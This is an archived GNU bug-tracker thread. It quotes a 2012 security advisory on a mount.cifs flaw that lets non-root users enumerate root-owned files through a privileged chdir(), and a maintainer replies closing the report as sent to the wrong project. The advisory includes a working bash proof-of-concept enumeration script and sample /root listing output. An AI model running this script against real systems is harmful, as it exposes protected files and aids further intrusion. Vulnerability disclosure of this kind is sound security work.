[debbugs-tracker] bug#10965: closed (mount.cifs vulnerability)

emacs-bug-tracker

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[debbugs-tracker] bug#10965: closed (mount.cifs vulnerability)

From:	GNU bug Tracking System
Subject:	[debbugs-tracker] bug#10965: closed (mount.cifs vulnerability)
Date:	Wed, 07 Mar 2012 18:48:02 +0000

Your message dated Wed, 07 Mar 2012 11:45:54 -0700
with message-id <address@hidden>
and subject line Re: bug#10965: mount.cifs vulnerability
has caused the debbugs.gnu.org bug report #10965,
regarding mount.cifs vulnerability
to be marked as done.

(If you believe you have received this mail in error, please contact
address@hidden)


-- 
10965: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=10965
GNU Bug Tracking System
Contact address@hidden with problems

--- Begin Message --- Subject: mount.cifs vulnerability Date: Wed, 07 Mar 2012 19:33:49 +0100 User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0) Gecko/20111108 Thunderbird/8.0

Hello, here is a bug report for mount.cifs,

is a little security breach on linux permissions by controlling aprivileged chdir()


regards.



########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################

1. VULNERABILITY
-------------------------
linux arbitrary privileged arbitrary chdir(),
this leads to an arbitarry file identification as root.

2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of linux base system, and is setuided on
most of the distributions.

This software mounts cifs partition to authorized directories by fstab.


3. DESCRIPTION
-------------------------

Althow there is not authorized cifs mounts, is possible by the secondparameter

to control a privileged chdir() syscall and infer the return value throught
the responses.

This implies, a little security breach on linux permissions. A non root user
can enumerate files and directories as root.

This can help to exploit another vulnerabilities, enumerate /root/ contents,
descriptors used by any process, user homes, etc ...

one of the attack vectors is /root/ directory scan:

address@hidden advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret

Also let to enumerate sub-sub directories in order to dump readable files.



4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by address@hidden

# discover root protected files & directories, user homes, processdescriptors, ...


path=$2
wordlist=$1

for i in `cat $wordlist`
do

echo -n "$i:"

/sbin/mount.cifs  //127.0.0.1/a $path/$i

done 2>log.$$ 1>&2

echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

rm log.$$



5. BUSINESS IMPACT
-------------------------
The confidenciality can be breached,

This method of transfer files, is highly dangerous and can rely on aremote control of the server


6. SYSTEMS AFFECTED
-------------------------
all versions are affected

7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.

8. REFERENCES
-------------------------
http://gnu.org


9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV

10. DISCOLSURE TIMELINE
-------------------------
February  20, 2012: Vulnerability discovered
March     07, 2012: Reported to the vendor


11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.



--
Jesus Olmos
address@hidden

Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900

--- End Message ---

--- Begin Message --- Subject: Re: bug#10965: mount.cifs vulnerability Date: Wed, 07 Mar 2012 11:45:54 -0700 User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20120216 Thunderbird/10.0.1

tag 10965 notabug
thanks

On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs,
> is a little security breach on linux permissions by controlling a
> privileged chdir()

Thanks for the report, but you have sent it to the wrong list.  GNU
coreutils does not maintain mount.cifs, so there is nothing this list
can do about fixing anything.  I'm closing the coreutils bug aspect,
although I encourage you to continue pursuing a correct fix with the
correct folks in charge of mount.cifs.

-- 
Eric Blake   address@hidden    +1-919-301-3266
Libvirt virtualization library http://libvirt.org

signature.asc
Description: OpenPGP digital signature

--- End Message ---

[Prev in Thread]

Current Thread

[Next in Thread]

[debbugs-tracker] bug#10965: closed (mount.cifs vulnerability), GNU bug Tracking System <=

Prev by Date: [debbugs-tracker] bug#10952: closed (24.0.94; ansi-color-for-comint-mode-on no longer working)
Next by Date: [debbugs-tracker] Processed: Re: bug#10965: mount.cifs vulnerability
Previous by thread: [debbugs-tracker] bug#10952: closed (24.0.94; ansi-color-for-comint-mode-on no longer working)
Next by thread: [debbugs-tracker] Processed: Re: bug#10965: mount.cifs vulnerability
Index(es):
- Date
- Thread